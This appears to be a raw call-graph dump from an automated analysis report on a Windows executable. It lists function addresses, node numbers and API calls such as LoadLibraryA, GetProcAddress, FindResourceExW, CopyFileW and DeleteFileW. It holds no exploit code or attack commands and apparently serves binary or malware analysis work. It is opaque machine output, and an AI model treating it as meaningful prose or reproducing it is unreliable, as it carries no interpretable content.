c4fe30 335 API calls 95903->95927 96838 c8cc5c 86 API calls 4 library calls 95904->96838 96845 c8cc5c 86 API calls 4 library calls 95906->96845 96844 c8cc5c 86 API calls 4 library calls 95907->96844 95909 c5c3c3 48 API calls 95909->95927 95914 cb9177 95913->95914 95918 cb9195 95913->95918 96839 c9f320 335 API calls 95914->96839 95924 c5351f 95916->95924 96770 c4e8d0 95916->96770 95919 cb918b 95918->95919 96840 c9f5ee 335 API calls 95918->96840 95919->95930 96841 c5c2d6 48 API calls ___crtGetEnvironmentStringsW 95919->96841 95921 c5f4ea 48 API calls 95921->95927 95925 c46eed 48 API calls 95924->95925 95926 c53540 95924->95926 95925->95926 95926->95930 95932 cb94b0 95926->95932 95936 c53585 95926->95936 95927->95881 95927->95882 95927->95883 95927->95901 95927->95903 95927->95909 95927->95921 95927->95924 95928 cb9394 95927->95928 95927->95930 96833 c4d9a0 53 API calls __cinit 95927->96833 96834 c4d8c0 53 API calls 95927->96834 96835 c5c2d6 48 API calls ___crtGetEnvironmentStringsW 95927->96835 96847 c9cda2 82 API calls Mailbox 95927->96847 96848 c880e3 53 API calls 95927->96848 96849 c4d764 55 API calls 95927->96849 96850 c4dcae 50 API calls Mailbox 95927->96850 95929 c5f4ea 48 API calls 95928->95929 95929->95881 95938 c53635 Mailbox 95930->95938 96836 c8cc5c 86 API calls 4 library calls 95930->96836 96853 c4dcae 50 API calls Mailbox 95932->96853 95933->95930 96854 c8cc5c 86 API calls 4 library calls 95933->96854 95935 c53615 96832 c4dcae 50 API calls Mailbox 95935->96832 95936->95930 95936->95933 95936->95935 95938->95613 95939->95611 95940->95614 95941->95618 95943 c8fa1c __ftell_nolock 95942->95943 95944 c8fa44 95943->95944 96082 c4d286 48 API calls 95943->96082 95946 c4936c 81 API calls 95944->95946 95947 c8fa5e 95946->95947 95948 c8fb68 95947->95948 95949 c8fa80 95947->95949 95959 c8fb92 95947->95959 95994 c441a9 95948->95994 95951 c4936c 81 API calls 95949->95951 95957 c8fa8c _wcscpy _wcschr 95951->95957 95953 c8fb8e 95954 c4936c 81 API calls 95953->95954 95953->95959 95956 c8fbc7 95954->95956 95955 c441a9 136 API calls 95955->95953 96018 c61dfc 95956->96018 95962 c8fab0 _wcscat _wcscpy 95957->95962 95965 c8fade _wcscat 95957->95965 95959->95858 95960 c4936c 81 API calls 95961 c8fafc _wcscpy 95960->95961 96083 c872cb GetFileAttributesW 95961->96083 95963 c4936c 81 API calls 95962->95963 95963->95965 95965->95960 95966 c8fb1c __wsetenvp 95966->95959 95967 c4936c 81 API calls 95966->95967 95969 c8fb48 95967->95969 95968 c8fbeb _wcscat _wcscpy 95971 c4936c 81 API calls 95968->95971 96084 c860dd 77 API calls 4 library calls 95969->96084 95973 c8fc82 95971->95973 95972 c8fb5c 95972->95959 96021 c8690b 95973->96021 95975 c8fca2 95976 c86524 3 API calls 95975->95976 95977 c8fcb1 95976->95977 95978 c4936c 81 API calls 95977->95978 95981 c8fce2 95977->95981 95979 c8fccb 95978->95979 96027 c8bfa4 95979->96027 95982 c44252 84 API calls 95981->95982 95982->95959 95984 c4425c 95983->95984 95988 c44263 95983->95988 95985 c635e4 __fcloseall 83 API calls 95984->95985 95985->95988 95986 c44272 95986->95858 95987 c44283 FreeLibrary 95987->95986 95988->95986 95988->95987 96754 c86ca9 GetFileAttributesW 95989->96754 95992->95859 95993->95858 96085 c44214 95994->96085 95999 c441d4 LoadLibraryExW 96095 c44291 95999->96095 96000 cb4f73 96001 c44252 84 API calls 96000->96001 96003 cb4f7a 96001->96003 96005 c44291 3 API calls 96003->96005 96008 cb4f82 96005->96008 96007 c441fb 96007->96008 96009 c44207 96007->96009 96121 c444ed 96008->96121 96010 c44252 84 API calls 96009->96010 96012 c4420c 96010->96012 96012->95953 96012->95955 96015 cb4fa9 96129 c44950 96015->96129 96427 c61e46 96018->96427 96022 c86918 _wcschr __ftell_nolock 96021->96022 96023 c61dfc __wsplitpath 47 API calls 96022->96023 96026 c8692e _wcscat _wcscpy 96022->96026 96024 c8695d 96023->96024 96025 c61dfc __wsplitpath 47 API calls 96024->96025 96025->96026 96026->95975 96028 c8bfb1 __ftell_nolock 96027->96028 96029 c5f4ea 48 API calls 96028->96029 96030 c8c00e 96029->96030 96031 c447b7 48 API calls 96030->96031 96032 c8c018 96031->96032 96033 c8bdb4 GetSystemTimeAsFileTime 96032->96033 96034 c8c023 96033->96034 96035 c44517 83 API calls 96034->96035 96036 c8c036 _wcscmp 96035->96036 96037 c8c05a 96036->96037 96038 c8c107 96036->96038 96483 c8c56d 96037->96483 96040 c8c56d 94 API calls 96038->96040 96056 c8c0d3 _wcscat 96040->96056 96042 c61dfc __wsplitpath 47 API calls 96047 c8c088 _wcscat _wcscpy 96042->96047 96043 c444ed 64 API calls 96045 c8c12c 96043->96045 96044 c8c110 96044->95981 96046 c444ed 64 API calls 96045->96046 96048 c8c13c 96046->96048 96050 c61dfc __wsplitpath 47 API calls 96047->96050 96049 c444ed 64 API calls 96048->96049 96051 c8c157 96049->96051 96050->96056 96052 c444ed 64 API calls 96051->96052 96053 c8c167 96052->96053 96054 c444ed 64 API calls 96053->96054 96055 c8c182 96054->96055 96057 c444ed 64 API calls 96055->96057 96056->96043 96056->96044 96058 c8c192 96057->96058 96059 c444ed 64 API calls 96058->96059 96060 c8c1a2 96059->96060 96061 c444ed 64 API calls 96060->96061 96062 c8c1b2 96061->96062 96453 c8c71a GetTempPathW GetTempFileNameW 96062->96453 96064 c8c1be 96065 c63499 117 API calls 96064->96065 96076 c8c1cf 96065->96076 96066 c8c289 96467 c635e4 96066->96467 96068 c8c294 96070 c8c29a DeleteFileW 96068->96070 96071 c8c2ae 96068->96071 96069 c444ed 64 API calls 96069->96076 96070->96044 96072 c8c342 CopyFileW 96071->96072 96077 c8c2b8 96071->96077 96073 c8c358 DeleteFileW 96072->96073 96074 c8c36a DeleteFileW 96072->96074 96073->96044 96480 c8c6d9 CreateFileW 96074->96480 96076->96044 96076->96066 96076->96069 96454 c62aae 96076->96454 96489 c8b965 118 API calls __fcloseall 96077->96489 96080 c8c32d 96080->96074 96081 c8c331 DeleteFileW 96080->96081 96081->96044 96082->95944 96083->95966 96084->95972 96134 c44339 96085->96134 96089 c44244 FreeLibrary 96090 c441bb 96089->96090 96092 c63499 96090->96092 96091 c4423c 96091->96089 96091->96090 96142 c634ae 96092->96142 96094 c441c8 96094->95999 96094->96000 96338 c442e4 96095->96338 96098 c442b8 96099 c442c1 FreeLibrary 96098->96099 96100 c441ec 96098->96100 96099->96100 96102 c44380 96100->96102 96103 c5f4ea 48 API calls 96102->96103 96104 c44395 96103->96104 96346 c447b7 96104->96346 96106 c443a1 ___crtGetEnvironmentStringsW 96107 c443dc 96106->96107 96108 c444d1 96106->96108 96109 c44499 96106->96109 96110 c44950 57 API calls 96107->96110 96360 c8c750 93 API calls 96108->96360 96349 c4406b CreateStreamOnHGlobal 96109->96349 96120 c443e5 96110->96120 96113 c444ed 64 API calls 96113->96120 96114 c44479 96114->96007 96116 cb4ed7 96117 c44517 83 API calls 96116->96117 96118 cb4eeb 96117->96118 96119 c444ed 64 API calls 96118->96119 96119->96114 96120->96113 96120->96114 96120->96116 96355 c44517 96120->96355 96122 cb4fc0 96121->96122 96123 c444ff 96121->96123 96384 c6381e 96123->96384 96126 c8bf5a 96404 c8bdb4 96126->96404 96128 c8bf70 96128->96015 96130 cb5002 96129->96130 96131 c4495f 96129->96131 96409 c63e65 96131->96409 96133 c44967 96138 c4434b 96134->96138 96137 c44321 LoadLibraryA GetProcAddress 96137->96091 96139 c4422f 96138->96139 96140 c44354 LoadLibraryA 96138->96140 96139->96091 96139->96137 96140->96139 96141 c44365 GetProcAddress 96140->96141 96141->96139 96145 c634ba __setmbcp 96142->96145 96143 c634cd 96190 c67c0e 47 API calls __getptd_noexit 96143->96190 96145->96143 96147 c634fe 96145->96147 96146 c634d2 96191 c66e10 8 API calls __wopenfile 96146->96191 96161 c6e4c8 96147->96161 96150 c63503 96151 c6350c 96150->96151 96152 c63519 96150->96152 96192 c67c0e 47 API calls __getptd_noexit 96151->96192 96154 c63543 96152->96154 96155 c63523 96152->96155 96175 c6e5e0 96154->96175 96193 c67c0e 47 API calls __getptd_noexit 96155->96193 96156 c634dd @_EH4_CallFilterFunc@8 __setmbcp 96156->96094 96162 c6e4d4 __setmbcp 96161->96162 96195 c67cf4 96162->96195 96164 c6e4e2 96165 c6e559 96164->96165 96173 c6e552 96164->96173 96205 c67d7c 96164->96205 96229 c64e5b 48 API calls __lock 96164->96229 96230 c64ec5 LeaveCriticalSection LeaveCriticalSection _doexit 96164->96230 96231 c669d0 47 API calls __crtCompareStringA_stat 96165->96231 96168 c6e560 96169 c6e56f InitializeCriticalSectionAndSpinCount EnterCriticalSection 96168->96169 96168->96173 96169->96173 96172 c6e5cc __setmbcp 96172->96150 96202 c6e5d7 96173->96202 96183 c6e600 __wopenfile 96175->96183 96176 c6e61a 96243 c67c0e 47 API calls __getptd_noexit 96176->96243 96178 c6e61f 96244 c66e10 8 API calls __wopenfile 96178->96244 96179 c6e7d5 96179->96176 96182 c6e838 96179->96182 96181 c6354e 96194 c63570 LeaveCriticalSection LeaveCriticalSection _fseek 96181->96194 96240 c763c9 96182->96240 96183->96176 96183->96179 96245 c6185b 59 API calls 2 library calls 96183->96245 96186 c6e7ce 96186->96179 96246 c6185b 59 API calls 2 library calls 96186->96246 96188 c6e7ed 96188->96179 96247 c6185b 59 API calls 2 library calls 96188->96247 96190->96146 96191->96156 96192->96156 96193->96156 96194->96156 96196 c67d05 96195->96196 96197 c67d18 EnterCriticalSection 96195->96197 96198 c67d7c __mtinitlocknum 46 API calls 96196->96198 96197->96164 96199 c67d0b 96198->96199 96199->96197 96232 c6115b 47 API calls 3 library calls 96199->96232 96233 c67e58 LeaveCriticalSection 96202->96233 96204 c6e5de 96204->96172 96206 c67d88 __setmbcp 96205->96206 96207 c67d91 96206->96207 96208 c67da9 96206->96208 96234 c681c2 47 API calls 2 library calls 96207->96234 96210 c67da7 96208->96210 96218 c67e11 __setmbcp 96208->96218 96210->96208 96237 c669d0 47 API calls __crtCompareStringA_stat 96210->96237 96211 c67d96 96235 c6821f 47 API calls 8 library calls 96211->96235 96214 c67dbd 96215 c67dc4 96214->96215 96216 c67dd3 96214->96216 96238 c67c0e 47 API calls __getptd_noexit 96215->96238 96220 c67cf4 __lock 46 API calls 96216->96220 96217 c67d9d 96236 c61145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 96217->96236 96218->96164 96223 c67dda 96220->96223 96222 c67dc9 96222->96218 96224 c67dfe 96223->96224 96225 c67de9 InitializeCriticalSectionAndSpinCount 96223->96225 96227 c61c9d _free 46 API calls 96224->96227 96226 c67e04 96225->96226 96239 c67e1a LeaveCriticalSection _doexit 96226->96239 96227->96226 96229->96164 96230->96164 96231->96168 96233->96204 96234->96211 96235->96217 96237->96214 96238->96222 96239->96218 96248 c75bb1 96240->96248 96242 c763e2 96242->96181 96243->96178 96244->96181 96245->96186 96246->96188 96247->96179 96249 c75bbd __setmbcp 96248->96249 96250 c75bcf 96249->96250 96253 c75c06 96249->96253 96335 c67c0e 47 API calls __getptd_noexit 96250->96335 96252 c75bd4 96336 c66e10 8 API calls __wopenfile 96252->96336 96259 c75c78 96253->96259 96256 c75c23 96337 c75c4c LeaveCriticalSection __unlock_fhandle 96256->96337 96258 c75bde __setmbcp 96258->96242 96260 c75c98 96259->96260 96261 c6273b __wsopen_helper 47 API calls 96260->96261 96264 c75cb4 96261->96264 96262 c66e20 __invoke_watson 8 API calls 96263 c763c8 96262->96263 96266 c75bb1 __wsopen_helper 104 API calls 96263->96266 96265 c75cee 96264->96265 96269 c75d11 96264->96269 96282 c75deb 96264->96282 96268 c67bda __free_osfhnd 47 API calls 96265->96268 96267 c763e2 96266->96267 96267->96256 96270 c75cf3 96268->96270 96273 c75dcf 96269->96273 96280 c75dad 96269->96280 96271 c67c0e __wopenfile 47 API calls 96270->96271 96272 c75d00 96271->96272 96274 c66e10 __wopenfile 8 API calls 96272->96274 96275 c67bda __free_osfhnd 47 API calls 96273->96275 96276 c75d0a 96274->96276 96277 c75dd4 96275->96277 96276->96256 96278 c67c0e __wopenfile 47 API calls 96277->96278 96279 c75de1 96278->96279 96281 c66e10 __wopenfile 8 API calls 96279->96281 96283 c6a979 __wsopen_helper 52 API calls 96280->96283 96281->96282 96282->96262 96284 c75e7b 96283->96284 96285 c75ea6 96284->96285 96286 c75e85 96284->96286 96287 c75b20 ___createFile GetModuleHandleW GetProcAddress CreateFileW 96285->96287 96288 c67bda __free_osfhnd 47 API calls 96286->96288 96297 c75ec8 96287->96297 96289 c75e8a 96288->96289 96291 c67c0e __wopenfile 47 API calls 96289->96291 96290 c75f46 GetFileType 96292 c75f93 96290->96292 96293 c75f51 GetLastError 96290->96293 96295 c75e94 96291->96295 96305 c6ac0b __set_osfhnd 48 API calls 96292->96305 96296 c67bed __dosmaperr 47 API calls 96293->96296 96294 c75f14 GetLastError 96298 c67bed __dosmaperr 47 API calls 96294->96298 96299 c67c0e __wopenfile 47 API calls 96295->96299 96300 c75f78 CloseHandle 96296->96300 96297->96290 96297->96294 96301 c75b20 ___createFile GetModuleHandleW GetProcAddress CreateFileW 96297->96301 96302 c75f39 96298->96302 96299->96276 96300->96302 96303 c75f86 96300->96303 96304 c75f09 96301->96304 96307 c67c0e __wopenfile 47 API calls 96302->96307 96306 c67c0e __wopenfile 47 API calls 96303->96306 96304->96290 96304->96294 96310 c75fb1 96305->96310 96308 c75f8b 96306->96308 96307->96282 96308->96302 96309 c7616c 96309->96282 96313 c7633f CloseHandle 96309->96313 96310->96309 96311 c6f82f __lseeki64_nolock 49 API calls 96310->96311 96327 c76032 96310->96327 96312 c7601b 96311->96312 96316 c67bda __free_osfhnd 47 API calls 96312->96316 96328 c7603a 96312->96328 96314 c75b20 ___createFile GetModuleHandleW GetProcAddress CreateFileW 96313->96314 96315 c76366 96314->96315 96317 c761f6 96315->96317 96318 c7636e GetLastError 96315->96318 96316->96327 96317->96282 96319 c67bed __dosmaperr 47 API calls 96318->96319 96320 c7637a 96319->96320 96323 c6ab1e __free_osfhnd 48 API calls 96320->96323 96321 c6ea9c __close_nolock 50 API calls 96321->96328 96322 c6ee0e 59 API calls __filbuf 96322->96328 96323->96317 96324 c76f40 __chsize_nolock 81 API calls 96324->96328 96325 c6f82f 49 API calls __lseeki64_nolock 96325->96327 96326 c6af61 __flswbuf 78 API calls 96326->96327 96327->96309 96327->96325 96327->96326 96327->96328 96328->96321 96328->96322 96328->96324 96328->96327 96329 c761e9 96328->96329 96330 c761d2 96328->96330 96334 c6f82f 49 API calls __lseeki64_nolock 96328->96334 96331 c6ea9c __close_nolock 50 API calls 96329->96331 96330->96309 96332 c761f0 96331->96332 96333 c67c0e __wopenfile 47 API calls 96332->96333 96333->96317 96334->96328 96335->96252 96336->96258 96337->96258 96342 c442f6 96338->96342 96341 c442cc LoadLibraryA GetProcAddress 96341->96098 96343 c442aa 96342->96343 96344 c442ff LoadLibraryA 96342->96344 96343->96098 96343->96341 96344->96343 96345 c44310 GetProcAddress 96344->96345 96345->96343 96347 c5f4ea 48 API calls 96346->96347 96348 c447c9 96347->96348 96348->96106 96350 c44085 FindResourceExW 96349->96350 96351 c440a2 96349->96351 96350->96351 96352 cb4f16 LoadResource 96350->96352 96351->96107 96352->96351 96353 cb4f2b SizeofResource 96352->96353 96353->96351 96354 cb4f3f LockResource 96353->96354 96354->96351 96356 c44526 96355->96356 96357 cb4fe0 96355->96357 96361 c63a8d 96356->96361 96359 c44534 96359->96120 96360->96107 96362 c63a99 __setmbcp 96361->96362 96363 c63aa7 96362->96363 96365 c63acd 96362->96365 96374 c67c0e 47 API calls __getptd_noexit 96363->96374 96376 c64e1c 96365->96376 96366 c63aac 96375 c66e10 8 API calls __wopenfile 96366->96375 96371 c63ae2 96383 c63b04 LeaveCriticalSection LeaveCriticalSection _fseek 96371->96383 96373 c63ab7 __setmbcp 96373->96359 96374->96366 96375->96373 96377 c64e4e EnterCriticalSection 96376->96377 96378 c64e2c 96376->96378 96379 c63ad3 96377->96379 96378->96377 96380 c64e34 96378->96380 96382 c639fe 81 API calls 4 library calls 96379->96382 96381 c67cf4 __lock 47 API calls 96380->96381 96381->96379 96382->96371 96383->96373 96387 c63839 96384->96387 96386 c44510 96386->96126 96388 c63845 __setmbcp 96387->96388 96389 c63888 96388->96389 96390 c63880 __setmbcp 96388->96390 96394 c6385b _memset 96388->96394 96391 c64e1c __lock_file 48 API calls 96389->96391 96390->96386 96393 c6388e 96391->96393 96402 c6365b 62 API calls 5 library calls 96393->96402 96400 c67c0e 47 API calls __getptd_noexit 96394->96400 96395 c63875 96401 c66e10 8 API calls __wopenfile 96395->96401 96397 c638a4 96403 c638c2 LeaveCriticalSection LeaveCriticalSection _fseek 96397->96403 96400->96395 96401->96390 96402->96397 96403->96390 96407 c6344a GetSystemTimeAsFileTime 96404->96407 96406 c8bdc3 96406->96128 96408 c63478 __aulldiv 96407->96408 96408->96406 96410 c63e71 __setmbcp 96409->96410 96411 c63e94 96410->96411 96412 c63e7f 96410->96412 96413 c64e1c __lock_file 48 API calls 96411->96413 96423 c67c0e 47 API calls __getptd_noexit 96412->96423 96415 c63e9a 96413->96415 96425 c63b0c 55 API calls 5 library calls 96415->96425 96416 c63e84 96424 c66e10 8 API calls __wopenfile 96416->96424 96419 c63ea5 96426 c63ec5 LeaveCriticalSection LeaveCriticalSection _fseek 96419->96426 96421 c63eb7 96422 c63e8f __setmbcp 96421->96422 96422->96133 96423->96416 96424->96422 96425->96419 96426->96421 96428 c61e61 96427->96428 96431 c61e55 96427->96431 96451 c67c0e 47 API calls __getptd_noexit 96428->96451 96430 c62019 96433 c61e41 96430->96433 96452 c66e10 8 API calls __wopenfile 96430->96452 96431->96428 96435 c61ed4 96431->96435 96446 c69d6b 47 API calls __wopenfile 96431->96446 96433->95968 96435->96428 96441 c61f41 96435->96441 96447 c69d6b 47 API calls __wopenfile 96435->96447 96436 c61fa0 96436->96428 96436->96433 96438 c61fb0 96436->96438 96437 c61f5f 96437->96428 96439 c61f7b 96437->96439 96448 c69d6b 47 API calls __wopenfile 96437->96448 96450 c69d6b 47 API calls __wopenfile 96438->96450 96439->96428 96439->96433 96443 c61f91 96439->96443 96441->96436 96441->96437 96449 c69d6b 47 API calls __wopenfile 96443->96449 96446->96435 96447->96441 96448->96439 96449->96433 96450->96433 96451->96430 96452->96433 96453->96064 96455 c62aba __setmbcp 96454->96455 96456 c62ad4 96455->96456 96457 c62aec 96455->96457 96460 c62ae4 __setmbcp 96455->96460 96502 c67c0e 47 API calls __getptd_noexit 96456->96502 96458 c64e1c __lock_file 48 API calls 96457->96458 96461 c62af2 96458->96461 96460->96076 96490 c62957 96461->96490 96462 c62ad9 96503 c66e10 8 API calls __wopenfile 96462->96503 96468 c635f0 __setmbcp 96467->96468 96469 c63604 96468->96469 96470 c6361c 96468->96470 96680 c67c0e 47 API calls __getptd_noexit 96469->96680 96472 c64e1c __lock_file 48 API calls 96470->96472 96476 c63614 __setmbcp 96470->96476 96474 c6362e 96472->96474 96473 c63609 96681 c66e10 8 API calls __wopenfile 96473->96681 96664 c63578 96474->96664 96476->96068 96481 c8c6ff SetFileTime CloseHandle 96480->96481 96482 c8c715 96480->96482 96481->96482 96482->96044 96488 c8c581 __tzset_nolock _wcscmp 96483->96488 96484 c444ed 64 API calls 96484->96488 96485 c8c05f 96485->96042 96485->96044 96486 c8bf5a GetSystemTimeAsFileTime 96486->96488 96487 c44517 83 API calls 96487->96488 96488->96484 96488->96485 96488->96486 96488->96487 96489->96080 96493 c62966 96490->96493 96496 c62984 96490->96496 96491 c62974 96537 c67c0e 47 API calls __getptd_noexit 96491->96537 96493->96491 96493->96496 96500 c6299c ___crtGetEnvironmentStringsW 96493->96500 96494 c62979 96538 c66e10 8 API calls __wopenfile 96494->96538 96504 c62b24 LeaveCriticalSection LeaveCriticalSection _fseek 96496->96504 96500->96496 96505 c62933 96500->96505 96512 c6af61 96500->96512 96539 c62c84 96500->96539 96545 c68e63 78 API calls 4 library calls 96500->96545 96502->96462 96503->96460 96504->96460 96506 c62952 96505->96506 96507 c6293d 96505->96507 96506->96500 96546 c67c0e 47 API calls __getptd_noexit 96507->96546 96509 c62942 96547 c66e10 8 API calls __wopenfile 96509->96547 96511 c6294d 96511->96500 96513 c6af6d __setmbcp 96512->96513 96514 c6af75 96513->96514 96515 c6af8d 96513->96515 96621 c67bda 47 API calls __getptd_noexit 96514->96621 96516 c6b022 96515->96516 96520 c6afbf 96515->96520 96626 c67bda 47 API calls __getptd_noexit 96516->96626 96519 c6af7a 96622 c67c0e 47 API calls __getptd_noexit 96519->96622 96548 c6a8ed 96520->96548 96521 c6b027 96627 c67c0e 47 API calls __getptd_noexit 96521->96627 96525 c6afc5 96527 c6afeb 96525->96527 96528 c6afd8 96525->96528 96526 c6b02f 96628 c66e10 8 API calls __wopenfile 96526->96628 96623 c67c0e 47 API calls __getptd_noexit 96527->96623 96557 c6b043 96528->96557 96532 c6afe4 96625 c6b01a LeaveCriticalSection __unlock_fhandle 96532->96625 96533 c6af82 __setmbcp 96533->96500 96534 c6aff0 96624 c67bda 47 API calls __getptd_noexit 96534->96624 96537->96494 96538->96496 96540 c62c97 96539->96540 96544 c62cbb 96539->96544 96541 c62933 __flswbuf 47 API calls 96540->96541 96540->96544 96542 c62cb4 96541->96542 96543 c6af61 __flswbuf 78 API calls 96542->96543 96543->96544 96544->96500 96545->96500 96546->96509 96547->96511 96549 c6a8f9 __setmbcp 96548->96549 96550 c6a946 EnterCriticalSection 96549->96550 96551 c67cf4 __lock 47 API calls 96549->96551 96552 c6a96c __setmbcp 96550->96552 96553 c6a91d 96551->96553 96552->96525 96554 c6a93a 96553->96554 96555 c6a928 InitializeCriticalSectionAndSpinCount 96553->96555 96629 c6a970 LeaveCriticalSection _doexit 96554->96629 96555->96554 96558 c6b050 __ftell_nolock 96557->96558 96559 c6b0ac 96558->96559 96560 c6b08d 96558->96560 96588 c6b082 96558->96588 96563 c6b105 96559->96563 96564 c6b0e9 96559->96564 96639 c67bda 47 API calls __getptd_noexit 96560->96639 96568 c6b11c 96563->96568 96645 c6f82f 49 API calls 3 library calls 96563->96645 96642 c67bda 47 API calls __getptd_noexit 96564->96642 96565 c6b86b 96565->96532 96566 c6b092 96640 c67c0e 47 API calls __getptd_noexit 96566->96640 96630 c73bf2 96568->96630 96571 c6b0ee 96643 c67c0e 47 API calls __getptd_noexit 96571->96643 96573 c6b099 96641 c66e10 8 API calls __wopenfile 96573->96641 96578 c6b0f5 96653 c6a70c 96588->96653 96621->96519 96622->96533 96623->96534 96624->96532 96625->96533 96626->96521 96627->96526 96628->96533 96629->96550 96631 c73bfd 96630->96631 96632 c73c0a 96630->96632 96660 c67c0e 47 API calls __getptd_noexit 96631->96660 96636 c73c16 96632->96636 96661 c67c0e 47 API calls __getptd_noexit 96632->96661 96639->96566 96640->96573 96641->96588 96642->96571 96643->96578 96645->96568 96654 c6a716 IsProcessorFeaturePresent 96653->96654 96655 c6a714 96653->96655 96657 c737b0 96654->96657 96655->96565 96663 c7375f 5 API calls ___raise_securityfailure 96657->96663 96659 c73893 96659->96565 96663->96659 96665 c63587 96664->96665 96666 c6359b 96664->96666 96710 c67c0e 47 API calls __getptd_noexit 96665->96710 96668 c63597 96666->96668 96669 c62c84 __flush 78 API calls 96666->96669 96682 c63653 LeaveCriticalSection LeaveCriticalSection _fseek 96668->96682 96671 c635a7 96669->96671 96670 c6358c 96711 c66e10 8 API calls __wopenfile 96670->96711 96683 c6eb36 96671->96683 96675 c62933 __flswbuf 47 API calls 96676 c635b5 96675->96676 96687 c6e9d2 96676->96687 96678 c635bb 96678->96668 96679 c61c9d _free 47 API calls 96678->96679 96679->96668 96680->96473 96681->96476 96682->96476 96684 c635af 96683->96684 96685 c6eb43 96683->96685 96684->96675 96685->96684 96686 c61c9d _free 47 API calls 96685->96686 96686->96684 96688 c6e9de __setmbcp 96687->96688 96689 c6e9e6 96688->96689 96690 c6e9fe 96688->96690 96727 c67bda 47 API calls __getptd_noexit 96689->96727 96692 c6ea7b 96690->96692 96695 c6ea28 96690->96695 96731 c67bda 47 API calls __getptd_noexit 96692->96731 96693 c6e9eb 96728 c67c0e 47 API calls __getptd_noexit 96693->96728 96699 c6a8ed ___lock_fhandle 49 API calls 96695->96699 96697 c6ea80 96732 c67c0e 47 API calls __getptd_noexit 96697->96732 96702 c6ea2e 96699->96702 96700 c6e9f3 __setmbcp 96700->96678 96701 c6ea88 96733 c66e10 8 API calls __wopenfile 96701->96733 96704 c6ea41 96702->96704 96705 c6ea4c 96702->96705 96712 c6ea9c 96704->96712 96729 c67c0e 47 API calls __getptd_noexit 96705->96729 96708 c6ea47 96730 c6ea73 LeaveCriticalSection __unlock_fhandle 96708->96730 96710->96670 96711->96668 96734 c6aba4 96712->96734 96716 c6eaaa 96727->96693 96728->96700 96729->96708 96730->96700 96731->96697 96732->96701 96733->96700 96735 c6abc4 96734->96735 96736 c6abaf 96734->96736 96740 c6abe9 96735->96740 96751 c67bda 47 API calls __getptd_noexit 96735->96751 96749 c67bda 47 API calls __getptd_noexit 96736->96749 96739 c6abb4 96740->96716 96741 c6abf3 96749->96739 96751->96741 96755 c86529 96754->96755 96756 c86cc4 FindFirstFileW 96754->96756 96755->95858 96756->96755 96757 c86cd9 FindClose 96756->96757 96757->96755 96759 c4bd3f 96758->96759 96762 c4bd5a 96758->96762 96760 c4bdfa 48 API calls 96759->96760 96761 c4bd47 CharUpperBuffW 96760->96761 96761->96762 96762->95869 96764 cb436a 96763->96764 96765 c42b8b 96763->96765 96766 c5f4ea 48 API calls 96765->96766 96767 c42b92 96766->96767 96768 c42bb3 96767->96768 96855 c42bce 48 API calls 96767->96855 96768->95889 96771 c4e8f6 96770->96771 96804 c4e906 Mailbox 96770->96804 96772 c4ed52 96771->96772 96771->96804 96939 c5e3cd 335 API calls 96772->96939 96773 c8cc5c 86 API calls 96773->96804 96775 c4ebdd 96775->95927 96777 c4ed63 96777->96775 96779 c4ed70 96777->96779 96778 c4e94c PeekMessageW 96778->96804 96941 c5e312 335 API calls Mailbox 96779->96941 96781 cb526e Sleep 96781->96804 96782 c4ed77 LockWindowUpdate DestroyWindow GetMessageW 96782->96775 96783 c4eda9 96782->96783 96786 cb59ef TranslateMessage DispatchMessageW GetMessageW 96783->96786 96784 c4ebc7 96784->96775 96940 c42ff6 16 API calls 96784->96940 96786->96786 96790 cb5a1f 96786->96790 96788 c4ed21 PeekMessageW 96788->96804 96789 c41caa 49 API calls 96789->96804 96790->96775 96791 c4ebf7 timeGetTime 96791->96804 96793 c5f4ea 48 API calls 96793->96804 96794 c46eed 48 API calls 96794->96804 96795 c4ed3a TranslateMessage DispatchMessageW 96795->96788 96796 cb5557 WaitForSingleObject 96797 cb5574 GetExitCodeProcess CloseHandle 96796->96797 96796->96804 96797->96804 96798 c4d7f7 48 API calls 96818 cb5429 Mailbox 96798->96818 96799 cb588f Sleep 96799->96818 96800 c4edae timeGetTime 96942 c41caa 49 API calls 96800->96942 96803 cb5733 Sleep 96803->96818 96804->96773 96804->96778 96804->96781 96804->96784 96804->96788 96804->96789 96804->96791 96804->96793 96804->96794 96804->96795 96804->96796 96804->96799 96804->96800 96804->96803 96806 c42aae 311 API calls 96804->96806 96812 cb5445 Sleep 96804->96812 96804->96818 96823 c4fe30 311 API calls 96804->96823 96825 c545e0 311 API calls 96804->96825 96826 c53200 311 API calls 96804->96826 96829 c4d6e9 55 API calls 96804->96829 96830 c4ce19 48 API calls 96804->96830 96856 c4ef00 96804->96856 96863 c4f110 96804->96863 96928 c5e244 96804->96928 96933 c5dc5f 96804->96933 96938 c4eed0 335 API calls Mailbox 96804->96938 96943 ca8d23 48 API calls 96804->96943 96806->96804 96808 c5dc38 timeGetTime 96808->96818 96809 cb5926 GetExitCodeProcess 96810 cb593c WaitForSingleObject 96809->96810 96811 cb5952 CloseHandle 96809->96811 96810->96804 96810->96811 96811->96818 96812->96804 96813 ca8c4b 108 API calls 96813->96818 96814 c42c79 107 API calls 96814->96818 96816 cb5432 Sleep 96816->96812 96817 cb59ae Sleep 96817->96804 96818->96798 96818->96804 96818->96808 96818->96809 96818->96812 96818->96813 96818->96814 96818->96816 96818->96817 96820 c4ce19 48 API calls 96818->96820 96824 c4d6e9 55 API calls 96818->96824 96944 c84cbe 49 API calls Mailbox 96818->96944 96945 c41caa 49 API calls 96818->96945 96946 c42aae 335 API calls 96818->96946 96947 c9ccb2 50 API calls 96818->96947 96948 c87a58 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 96818->96948 96949 c86532 63 API calls 3 library calls 96818->96949 96820->96818 96823->96804 96824->96818 96825->96804 96826->96804 96829->96804 96830->96804 96831->95877 96832->95930 96833->95927 96834->95927 96835->95927 96836->95938 96837->95877 96838->95930 96839->95919 96840->95919 96841->95876 96842->95930 96843->95902 96844->95930 96845->95930 96846->95930 96847->95927 96848->95927 96849->95927 96850->95927 96851->95930 96852->95924 96853->95933 96854->95930 96855->96768 96857 c4ef1d 96856->96857 96858 c4ef2f 96856->96858 96950 c4e3b0 335 API calls 2 library calls 96857->96950 96951 c8cc5c 86 API calls 4 library calls 96858->96951 96860 c4ef26 96860->96804 96862 cb86f9 96862->96862 96864 c4f130 96863->96864 96867 c4fe30 335 API calls 96864->96867 96870 c4f199 96864->96870 96865 c4f3dd 96868 cb87c8 96865->96868 96881 c4f3f2 96865->96881 96912 c4f431 Mailbox 96865->96912 96866 c4f595 96874 c4d7f7 48 API calls 96866->96874 96866->96912 